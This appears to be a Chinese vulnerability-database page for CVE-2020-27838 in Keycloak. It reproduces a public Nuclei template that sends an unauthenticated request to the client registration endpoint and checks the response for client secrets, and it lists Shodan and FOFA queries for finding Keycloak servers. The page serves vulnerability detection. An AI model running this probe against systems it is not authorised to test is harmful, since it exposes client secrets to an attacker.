CVE-2020-27838: KeyCloak - Information Exposure

日期: 2025-08-01 | 影响软件: KeyCloak | POC: 已公开

漏洞描述

A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.

PoC代码[已公开]

id: CVE-2020-27838

info:
  name: KeyCloak - Information Exposure
  author: mchklt
  severity: medium
  description: |
    A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
  impact: |
    The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.
  remediation: |
    Apply the latest security patches or updates provided by the KeyCloak vendor.
  reference:
    - https://bugzilla.redhat.com/show_bug.cgi?id=1906797
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27838
    - https://github.com/muneebaashiq/MBProjects
    - https://github.com/j4k0m/godkiller
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-27838
    cwe-id: CWE-287
    epss-score: 0.89101
    epss-percentile: 0.99514
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - "title:\"keycloak\""
      - http.title:"keycloak"
      - http.html:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,exposure,redhat

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"clientId":\s*"security-admin-console"'
          - '"secret":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220254ed1dd7e011438dfbf5d551f1a065197d1087f7e19a543aa8de721b9ed7b01022100becfcfc9d93614e6a59ee78b1c5f64ed783bebea83dd1eb927f5aa1ecd291a2a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-27838.yaml

相关漏洞推荐